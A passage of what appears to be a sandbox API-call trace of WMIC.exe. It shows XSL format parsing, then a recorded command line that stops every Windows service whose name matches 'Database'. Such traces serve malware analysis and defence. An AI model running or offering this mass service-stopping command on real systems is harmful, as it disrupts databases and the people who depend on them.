attributeMap=0x323fdb8 | out: attributeMap=0x323fdb8*=0x3499fa8) returned 0x0 [0299.916] malloc (_Size=0xc) returned 0x34ead80 [0299.916] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3499fa8, name="KEYWORD", namedItem=0x323fdb4 | out: namedItem=0x323fdb4*=0x3499ff8) returned 0x0 [0299.916] free (_Block=0x34ead80) [0299.916] IXMLDOMNode:get_nodeValue (in: This=0x3499ff8, value=0x323fd74 | out: value=0x323fd74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0299.916] malloc (_Size=0xc) returned 0x34ead80 [0299.916] malloc (_Size=0xc) returned 0x34eabe8 [0299.916] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0299.916] SysStringLen (param_1="TABLE") returned 0x5 [0299.916] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0299.916] SysStringLen (param_1="XML") returned 0x3 [0299.916] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0299.916] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0299.916] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0299.916] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0299.916] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0299.916] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0299.916] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0299.917] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0299.917] malloc (_Size=0x18) returned 0x34e2b60 [0299.917] IUnknown:Release (This=0x3496b88) returned 0x0 [0299.917] IUnknown:Release (This=0x3499fa8) returned 0x0 [0299.917] IUnknown:Release (This=0x3499ff8) returned 0x0 [0299.917] IXMLDOMNodeList:get_item (in: This=0x3499ca0, index=15, listItem=0x323fdbc | out: listItem=0x323fdbc*=0x3496b88) returned 0x0 [0299.917] IXMLDOMNode:get_text (in: This=0x3496b88, text=0x323fdc0 | out: text=0x323fdc0*="htable.xsl") returned 0x0 [0299.917] IXMLDOMNode:get_attributes (in: This=0x3496b88, attributeMap=0x323fdb8 | out: attributeMap=0x323fdb8*=0x3499fa8) returned 0x0 [0299.917] malloc (_Size=0xc) returned 0x34eac00 [0299.917] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3499fa8, name="KEYWORD", namedItem=0x323fdb4 | out: namedItem=0x323fdb4*=0x3499ff8) returned 0x0 [0299.917] free (_Block=0x34eac00) [0299.917] IXMLDOMNode:get_nodeValue (in: This=0x3499ff8, value=0x323fd74 | out: value=0x323fd74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0299.917] malloc (_Size=0xc) returned 0x34eadf8 [0299.918] malloc (_Size=0xc) returned 0x34eadb0 [0299.918] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0299.918] SysStringLen (param_1="TABLE") returned 0x5 [0299.918] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0299.918] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0299.918] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0299.918] SysStringLen (param_1="XML") returned 0x3 [0299.918] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0299.918] SysStringLen (param_1="texttablewsys") returned 0xd [0299.918] SysStringLen (param_1="XML") returned 0x3 [0299.918] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0299.918] malloc (_Size=0x18) returned 0x34e2b80 [0299.918] IUnknown:Release (This=0x3496b88) returned 0x0 [0299.918] IUnknown:Release (This=0x3499fa8) returned 0x0 [0299.918] IUnknown:Release (This=0x3499ff8) returned 0x0 [0299.918] IXMLDOMNodeList:get_item (in: This=0x3499ca0, index=16, listItem=0x323fdbc | out: listItem=0x323fdbc*=0x3496b88) returned 0x0 [0299.918] IXMLDOMNode:get_text (in: This=0x3496b88, text=0x323fdc0 | out: text=0x323fdc0*="htable.xsl") returned 0x0 [0299.918] IXMLDOMNode:get_attributes (in: This=0x3496b88, attributeMap=0x323fdb8 | out: attributeMap=0x323fdb8*=0x3499fa8) returned 0x0 [0299.918] malloc (_Size=0xc) returned 0x34eadc8 [0299.919] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3499fa8, name="KEYWORD", namedItem=0x323fdb4 | out: namedItem=0x323fdb4*=0x3499ff8) returned 0x0 [0299.919] free (_Block=0x34eadc8) [0299.919] IXMLDOMNode:get_nodeValue (in: This=0x3499ff8, value=0x323fd74 | out: value=0x323fd74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0299.919] malloc (_Size=0xc) returned 0x34eac00 [0299.919] malloc (_Size=0xc) returned 0x34eac18 [0299.919] SysStringLen (param_1="htable-sortby") returned 0xd [0299.919] SysStringLen (param_1="TABLE") returned 0x5 [0299.919] SysStringLen (param_1="htable-sortby") returned 0xd [0299.919] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0299.919] SysStringLen (param_1="htable-sortby") returned 0xd [0299.919] SysStringLen (param_1="XML") returned 0x3 [0299.919] SysStringLen (param_1="htable-sortby") returned 0xd [0299.919] SysStringLen (param_1="texttablewsys") returned 0xd [0299.919] SysStringLen (param_1="htable-sortby") returned 0xd [0299.919] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0299.919] SysStringLen (param_1="XML") returned 0x3 [0299.919] SysStringLen (param_1="htable-sortby") returned 0xd [0299.919] malloc (_Size=0x18) returned 0x34e29e0 [0299.919] IUnknown:Release (This=0x3496b88) returned 0x0 [0299.920] IUnknown:Release (This=0x3499fa8) returned 0x0 [0299.920] IUnknown:Release (This=0x3499ff8) returned 0x0 [0299.920] IXMLDOMNodeList:get_item (in: This=0x3499ca0, index=17, listItem=0x323fdbc | out: listItem=0x323fdbc*=0x3496b88) returned 0x0 [0299.920] IXMLDOMNode:get_text (in: This=0x3496b88, text=0x323fdc0 | out: text=0x323fdc0*="mof.xsl") returned 0x0 [0299.920] IXMLDOMNode:get_attributes (in: This=0x3496b88, attributeMap=0x323fdb8 | out: attributeMap=0x323fdb8*=0x3499fa8) returned 0x0 [0299.920] malloc (_Size=0xc) returned 0x34eab10 [0299.920] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3499fa8, name="KEYWORD", namedItem=0x323fdb4 | out: namedItem=0x323fdb4*=0x3499ff8) returned 0x0 [0299.920] free (_Block=0x34eab10) [0299.920] IXMLDOMNode:get_nodeValue (in: This=0x3499ff8, value=0x323fd74 | out: value=0x323fd74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0299.920] malloc (_Size=0xc) returned 0x34eacc0 [0299.920] malloc (_Size=0xc) returned 0x34ead98 [0299.920] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0299.920] SysStringLen (param_1="TABLE") returned 0x5 [0299.920] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0299.921] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0299.921] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0299.921] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0299.921] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0299.921] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0299.921] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0299.921] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0299.921] malloc (_Size=0x18) returned 0x34e2bc0 [0299.921] IUnknown:Release (This=0x3496b88) returned 0x0 [0299.921] IUnknown:Release (This=0x3499fa8) returned 0x0 [0299.921] IUnknown:Release (This=0x3499ff8) returned 0x0 [0299.921] IXMLDOMNodeList:get_item (in: This=0x3499ca0, index=18, listItem=0x323fdbc | out: listItem=0x323fdbc*=0x3496b88) returned 0x0 [0299.921] IXMLDOMNode:get_text (in: This=0x3496b88, text=0x323fdc0 | out: text=0x323fdc0*="mof.xsl") returned 0x0 [0299.921] IXMLDOMNode:get_attributes (in: This=0x3496b88, attributeMap=0x323fdb8 | out: attributeMap=0x323fdb8*=0x3499fa8) returned 0x0 [0299.921] malloc (_Size=0xc) returned 0x34eadc8 [0299.921] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3499fa8, name="KEYWORD", namedItem=0x323fdb4 | out: namedItem=0x323fdb4*=0x3499ff8) returned 0x0 [0299.922] free (_Block=0x34eadc8) [0299.922] IXMLDOMNode:get_nodeValue (in: This=0x3499ff8, value=0x323fd74 | out: value=0x323fd74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0299.922] malloc (_Size=0xc) returned 0x34eac48 [0299.922] malloc (_Size=0xc) returned 0x34eab58 [0299.922] SysStringLen (param_1="wmiclimofformat") returned 0xf [0299.922] SysStringLen (param_1="TABLE") returned 0x5 [0299.922] SysStringLen (param_1="wmiclimofformat") returned 0xf [0299.922] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0299.922] SysStringLen (param_1="wmiclimofformat") returned 0xf [0299.922] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0299.922] SysStringLen (param_1="wmiclimofformat") returned 0xf [0299.922] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0299.922] SysStringLen (param_1="wmiclimofformat") returned 0xf [0299.922] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0299.922] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0299.922] SysStringLen (param_1="wmiclimofformat") returned 0xf [0299.922] malloc (_Size=0x18) returned 0x34e2be0 [0299.922] IUnknown:Release (This=0x3496b88) returned 0x0 [0299.922] IUnknown:Release (This=0x3499fa8) returned 0x0 [0299.922] IUnknown:Release (This=0x3499ff8) returned 0x0 [0299.922] IXMLDOMNodeList:get_item (in: This=0x3499ca0, index=19, listItem=0x323fdbc | out: listItem=0x323fdbc*=0x3496b88) returned 0x0 [0299.923] IXMLDOMNode:get_text (in: This=0x3496b88, text=0x323fdc0 | out: text=0x323fdc0*="textvaluelist.xsl") returned 0x0 [0299.923] IXMLDOMNode:get_attributes (in: This=0x3496b88, attributeMap=0x323fdb8 | out: attributeMap=0x323fdb8*=0x3499fa8) returned 0x0 [0299.923] malloc (_Size=0xc) returned 0x34eacf0 [0299.923] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3499fa8, name="KEYWORD", namedItem=0x323fdb4 | out: namedItem=0x323fdb4*=0x3499ff8) returned 0x0 [0299.923] free (_Block=0x34eacf0) [0299.923] IXMLDOMNode:get_nodeValue (in: This=0x3499ff8, value=0x323fd74 | out: value=0x323fd74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0299.923] malloc (_Size=0xc) returned 0x34eab88 [0299.923] malloc (_Size=0xc) returned 0x34eacf0 [0299.924] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0299.924] SysStringLen (param_1="TABLE") returned 0x5 [0299.924] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0299.924] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0299.924] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0299.924] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0299.924] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0299.924] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0299.924] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0299.924] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0299.924] malloc (_Size=0x18) returned 0x34e2c00 [0299.924] IUnknown:Release (This=0x3496b88) returned 0x0 [0299.924] IUnknown:Release (This=0x3499fa8) returned 0x0 [0299.924] IUnknown:Release (This=0x3499ff8) returned 0x0 [0299.924] IXMLDOMNodeList:get_item (in: This=0x3499ca0, index=20, listItem=0x323fdbc | out: listItem=0x323fdbc*=0x3496b88) returned 0x0 [0299.924] IXMLDOMNode:get_text (in: This=0x3496b88, text=0x323fdc0 | out: text=0x323fdc0*="textvaluelist.xsl") returned 0x0 [0299.924] IXMLDOMNode:get_attributes (in: This=0x3496b88, attributeMap=0x323fdb8 | out: attributeMap=0x323fdb8*=0x3499fa8) returned 0x0 [0299.924] malloc (_Size=0xc) returned 0x34eab28 [0299.925] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3499fa8, name="KEYWORD", namedItem=0x323fdb4 | out: namedItem=0x323fdb4*=0x3499ff8) returned 0x0 [0299.925] free (_Block=0x34eab28) [0299.925] IXMLDOMNode:get_nodeValue (in: This=0x3499ff8, value=0x323fd74 | out: value=0x323fd74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0299.925] malloc (_Size=0xc) returned 0x34eac60 [0299.925] malloc (_Size=0xc) returned 0x34eadc8 [0299.925] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0299.925] SysStringLen (param_1="TABLE") returned 0x5 [0299.925] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0299.925] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0299.925] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0299.925] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0299.925] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0299.925] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0299.925] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0299.925] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0299.925] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0299.925] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0299.925] malloc (_Size=0x18) returned 0x34e2c60 [0299.925] IUnknown:Release (This=0x3496b88) returned 0x0 [0299.925] IUnknown:Release (This=0x3499fa8) returned 0x0 [0299.926] IUnknown:Release (This=0x3499ff8) returned 0x0 [0299.926] IUnknown:Release (This=0x3499ca0) returned 0x0 [0299.926] FreeThreadedDOMDocument:IUnknown:Release (This=0x3496b48) returned 0x1 [0299.926] FreeThreadedDOMDocument:IUnknown:Release (This=0x34945a8) returned 0x0 [0299.926] free (_Block=0x34e98c8) [0299.926] GetCommandLineW () returned="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%Database%%'\" call stopservice" [0299.926] malloc (_Size=0xe0) returned 0x34eaee8 [0299.926] memcpy_s (in: _Destination=0x34eaee8, _DestinationSize=0xde, _Source=0x3511b78, _SourceSize=0xd0 | out: _Destination=0x34eaee8) returned 0x0 [0299.926] malloc (_Size=0xc) returned 0x34eac78 [0299.926] malloc (_Size=0xc) returned 0x34eac90 [0299.926] malloc (_Size=0xc) returned 0x34eade0 [0299.926] malloc (_Size=0xc) returned 0x34ead50 [0299.927] malloc (_Size=0x80) returned 0x34eafd0 [0299.927] GetLocalTime (in: lpSystemTime=0x323fd58 | out: lpSystemTime=0x323fd58*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x2, wHour=0x8, wMinute=0x1d, wSecond=0x5, wMilliseconds=0x3d4)) [0299.927] _vsnwprintf (in: _Buffer=0x34eafd0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x323fd38 | out: _Buffer="04-02-2020T08:29:05") returned 19 [0299.927] lstrlenW (lpString=" path Win32_Service where \"name like '%%Database%%'\" call stopservice") returned 69 [0299.927] malloc (_Size=0x8c) returned 0x34eb058 [0299.927] lstrlenW (lpString=" path Win32_Service where \"name like '%%Database%%'\" call stopservice") returned 69 [0299.927] lstrlenW (lpString=" path Win32_Service where \"name like '%%Database%%'\" call stopservice") returned 69 [0299.927] malloc (_Size=0x8c) returned 0x34eb0f0 [0299.927] lstrlenW (lpString=" path Win32_Service where \"name like '%%Database%%'\" call stopservice") returned 69 [0299.927] lstrlenW (lpString=" path Win32_Service where \"name like '%%Database%%'\" call stopservice") returned 69 [0299.927] lstrlenW (lpString=" path Win32_Service where \"name like '%%Database%%'\" call stopservice") returned 69 [0299.927] malloc (_Size=0xa) returned 0x34eab70 [0299.927] lstrlenW (lpString="path") returned 4 [0299.927] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0299.927] malloc (_Size=0xa) returned 0x34eaca8 [0299.927] malloc (_Size=0x4) returned 0x34e2ee8 [0299.927] free (_Block=0x0) [0299.927] free (_Block=0x34eab70) [0299.927] lstrlenW (lpString=" path Win32_Service where \"name like '%%Database%%'\" call stopservice") returned 69 [0299.927] malloc (_Size=0x1c) returned 0x34e9da8 [0299.927] lstrlenW (lpString="Win32_Service") returned 13 [0299.927] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0299.927] malloc (_Size=0x1c) returned 0x34e0568 [0299.927] malloc (_Size=0x8) returned 0x34e0590 [0299.928] memmove_s (in: _Destination=0x34e0590, _DestinationSize=0x4, _Source=0x34e2ee8, _SourceSize=0x4 | out: _Destination=0x34e0590) returned 0x0 [0299.928] free (_Block=0x34e2ee8) [0299.928] free (_Block=0x0) [0299.928] free (_Block=0x34e9da8) [0299.928] lstrlenW (lpString=" path Win32_Service where \"name like '%%Database%%'\" call stopservice") returned 69 [0299.928] malloc (_Size=0xc) returned 0x34ead08 [0299.928] lstrlenW (lpString="where") returned 5 [0299.928] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0299.928] malloc (_Size=0xc) returned 0x34eab10 [0299.928] malloc (_Size=0xc) returned 0x34eab28 [0299.928] memmove_s (in: _Destination=0x34eab28, _DestinationSize=0x8, _Source=0x34e0590, _SourceSize=0x8 | out: _Destination=0x34eab28) returned 0x0 [0299.928] free (_Block=0x34e0590) [0299.928] free (_Block=0x0) [0299.928] free (_Block=0x34ead08) [0299.928] lstrlenW (lpString=" path Win32_Service where \"name like '%%Database%%'\" call stopservice") returned 69 [0299.928] malloc (_Size=0x36) returned 0x34eb188 [0299.928] lstrlenW (lpString="\"name like '%%Database%%'\"") returned 26 [0299.928] _wcsicmp (_String1="\"name like '%%Database%%'\"", _String2="\"NULL\"") returned -20 [0299.928] lstrlenW (lpString="\"name like '%%Database%%'\"") returned 26 [0299.928] lstrlenW (lpString="\"name like '%%Database%%'\"") returned 26 [0299.928] malloc (_Size=0x36) returned 0x34eb1c8 [0299.928] malloc (_Size=0x10) returned 0x34eab70 [0299.928] memmove_s (in: _Destination=0x34eab70, _DestinationSize=0xc, _Source=0x34eab28, _SourceSize=0xc | out: _Destination=0x34eab70) returned 0x0 [0299.928] free (_Block=0x34eab28) [0299.928] free (_Block=0x0) [0299.928] free (_Block=0x34eb188) [0299.928] lstrlenW (lpString=" path Win32_Service where \"name like '%%Database%%'\" call stopservice") returned 69 [0299.929] malloc (_Size=0xa) returned 0x34ead08 [0299.929] lstrlenW (lpString="call") returned 4 [0299.929] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0299.929] malloc (_Size=0xa) returned 0x34eab28 [0299.929] malloc (_Size=0x18) returned 0x34e29a0 [0299.929] memmove_s (in: _Destination=0x34e29a0, _DestinationSize=0x10, _Source=0x34eab70, _SourceSize=0x10 | out: _Destination=0x34e29a0) returned 0x0 [0299.929] free (_Block=0x34eab70) [0299.929] free (_Block=0x0) [0299.929] free (_Block=0x34ead08) [0299.929] lstrlenW (lpString=" path Win32_Service where \"name like '%%Database%%'\" call stopservice") returned 69 [0299.929] malloc (_Size=0x18) returned 0x34e2c80 [0299.929] lstrlenW (lpString="stopservice") returned 11 [0299.929] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0299.929] malloc (_Size=0x18) returned 0x34e2ca0 [0299.929] free (_Block=0x0) [0299.929] free (_Block=0x34e2c80) [0299.929] malloc (_Size=0x18) returned 0x34e2c80 [0299.929] lstrlenW (lpString="QUIT") returned 4 [0299.929] lstrlenW (lpString="path") returned 4 [0299.929] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0299.929] lstrlenW (lpString="EXIT") returned 4 [0299.929] lstrlenW (lpString="path") returned 4 [0299.929] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0299.929] free (_Block=0x34e2c80) [0299.929] WbemLocator:IUnknown:AddRef (This=0x35248f0) returned 0x2 [0299.929] malloc (_Size=0x18) returned 0x34e2ce0 [0299.929] lstrlenW (lpString="/") returned 1 [0299.930] lstrlenW (lpString="path") returned 4 [0299.930] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0299.930] lstrlenW (lpString="-") returned 1 [0299.930] lstrlenW (lpString="path") returned 4 [0299.930] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0299.930] lstrlenW (lpString="CLASS") returned 5 [0299.930] lstrlenW (lpString="path") returned 4 [0299.930] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0299.930] lstrlenW (lpString="PATH") returned 4 [0299.930] lstrlenW (lpString="path") returned 4 [0299.930] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0299.930] lstrlenW (lpString="/") returned 1 [0299.930] lstrlenW (lpString="Win32_Service") returned 13 [0299.930] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0299.930] lstrlenW (lpString="-") returned 1 [0299.930] lstrlenW (lpString="Win32_Service") returned 13 [0299.930] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0299.930] lstrlenW (lpString="Win32_Service") returned 13 [0299.930] malloc (_Size=0x1c) returned 0x34e9da8 [0299.930] lstrlenW (lpString="Win32_Service") returned 13 [0299.931] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xd69a206 | out: _String="Win32_Service", _Context=0xd69a206) returned="Win32_Service" [0299.931] lstrlenW (lpString="Win32_Service") returned 13 [0299.931] malloc (_Size=0x1c) returned 0x34eb188 [0299.931] lstrlenW (lpString="Win32_Service") returned 13 [0299.931] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xd69a206 | out: _String=0x0, _Context=0xd69a206) returned 0x0 [0299.931] lstrlenW (lpString="") returned 0 [0299.931] lstrlenW (lpString="WHERE") returned 5 [0299.931] lstrlenW (lpString="where") returned 5 [0299.931] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0299.931] lstrlenW (lpString="/") returned 1 [0299.931] lstrlenW (lpString="name like '%%Database%%'") returned 24 [0299.931] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%Database%%'", cchCount1=24, lpString2="/", cchCount2=1) returned 3 [0299.931] lstrlenW (lpString="-") returned 1 [0299.931] lstrlenW (lpString="name like '%%Database%%'") returned 24 [0299.931] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%Database%%'", cchCount1=24, lpString2="-", cchCount2=1) returned 3 [0299.931] lstrlenW (lpString="name like '%%Database%%'") returned 24 [0299.931] malloc (_Size=0x32) returned 0x34eb208 [0299.931] lstrlenW (lpString="name like '%%Database%%'") returned 24 [0299.931] lstrlenW (lpString="/") returned 1 [0299.931] lstrlenW (lpString="call") returned 4 [0299.931] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0299.931] lstrlenW (lpString="-") returned 1 [0299.931] lstrlenW (lpString="call") returned 4 [0299.931] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0299.932] lstrlenW (lpString="call") returned 4 [0299.932] malloc (_Size=0xa) returned 0x34ead08 [0299.932] lstrlenW (lpString="call") returned 4 [0299.932] lstrlenW (lpString="GET") returned 3 [0299.932] lstrlenW (lpString="call") returned 4 [0299.932] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0299.932] lstrlenW (lpString="LIST") returned 4 [0299.932] lstrlenW (lpString="call") returned 4 [0299.932] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0299.932] lstrlenW (lpString="SET") returned 3 [0299.932] lstrlenW (lpString="call") returned 4 [0299.932] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0299.932] lstrlenW (lpString="CREATE") returned 6 [0299.932] lstrlenW (lpString="call") returned 4 [0299.932] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0299.932] lstrlenW (lpString="CALL") returned 4 [0299.932] lstrlenW (lpString="call") returned 4 [0299.932] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0299.932] lstrlenW (lpString="/") returned 1 [0299.932] lstrlenW (lpString="stopservice") returned 11 [0299.932] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0299.932] lstrlenW (lpString="-") returned 1 [0299.932] lstrlenW (lpString="stopservice") returned 11 [0299.932] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0299.932] lstrlenW (lpString="stopservice") returned 11 [0299.932] malloc (_Size=0x18) returned 0x34e29c0 [0299.932] lstrlenW (lpString="stopservice") returned 11 [0299.932] ??0CHString@@QAE@XZ () returned 0x323dc1c [0299.933] GetCurrentThreadId () returned 0x12ac [0299.933] GetCurrentThreadId () returned 0x12ac [0299.933] ??0CHString@@QAE@XZ () returned 0x323dba4 [0299.933] malloc (_Size=0x4) returned 0x34e2ee8 [0299.933] malloc (_Size=0xc) returned 0x34eab70 [0299.933] malloc (_Size=0xc) returned 0x34eaed0 [0299.933] WbemLocator:IWbemLocator:ConnectServer (in: This=0x35248f0, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68518 | out: ppNamespace=0xa68518*=0x352ad70) returned 0x0 [0299.999] free (_Block=0x34eaed0) [0299.999] CoSetProxyBlanket (pProxy=0x352ad70, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0299.999] free (_Block=0x34e2ee8) [0299.999] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0299.999] free (_Block=0x34eab70) [0299.999] malloc (_Size=0xc) returned 0x34eab70 [0299.999] IWbemServices:GetObject (in: This=0x352ad70, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x323dc34*=0x0, ppCallResult=0x0 | out: ppObject=0x323dc34*=0x3580a80, ppCallResult=0x0) returned 0x0 [0300.071] free (_Block=0x34eab70) [0300.071] IWbemClassObject:BeginMethodEnumeration (This=0x3580a80, lEnumFlags=0) returned 0x0 [0300.071] IWbemClassObject:NextMethod (in: This=0x3580a80, lFlags=0, pstrName=0x323dc40*=0x0, ppInSignature=0x323dc3c*=0x0, ppOutSignature=0x323dc38*=0x0 | out: pstrName=0x323dc40*="StartService", ppInSignature=0x323dc3c*=0x0, ppOutSignature=0x323dc38*=0x3580c78) returned 0x0 [0300.071] lstrlenW (lpString="StartService") returned 12 [0300.071] lstrlenW (lpString="stopservice") returned 11 [0300.072] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0300.072] IUnknown:Release (This=0x3580c78) returned 0x0 [0300.072] IWbemClassObject:NextMethod (in: This=0x3580a80, lFlags=0, pstrName=0x323dc40*=0x0, ppInSignature=0x323dc3c*=0x0, ppOutSignature=0x323dc38*=0x0 | out: pstrName=0x323dc40*="StopService", ppInSignature=0x323dc3c*=0x0, ppOutSignature=0x323dc38*=0x3580c78) returned 0x0 [0300.072] lstrlenW (lpString="StopService") returned 11 [0300.072] lstrlenW (lpString="stopservice") returned 11 [0300.072] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0300.072] malloc (_Size=0x38) returned 0x34eb9b8 [0300.072] ??0CHString@@QAE@XZ () returned 0x323d784 [0300.072] GetCurrentThreadId () returned 0x12ac [0300.072] IWbemClassObject:GetNames (in: This=0x3580c78, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x323d794 | out: pNames=0x323d794*="\x01ƀ\x04") returned 0x0 [0300.073] 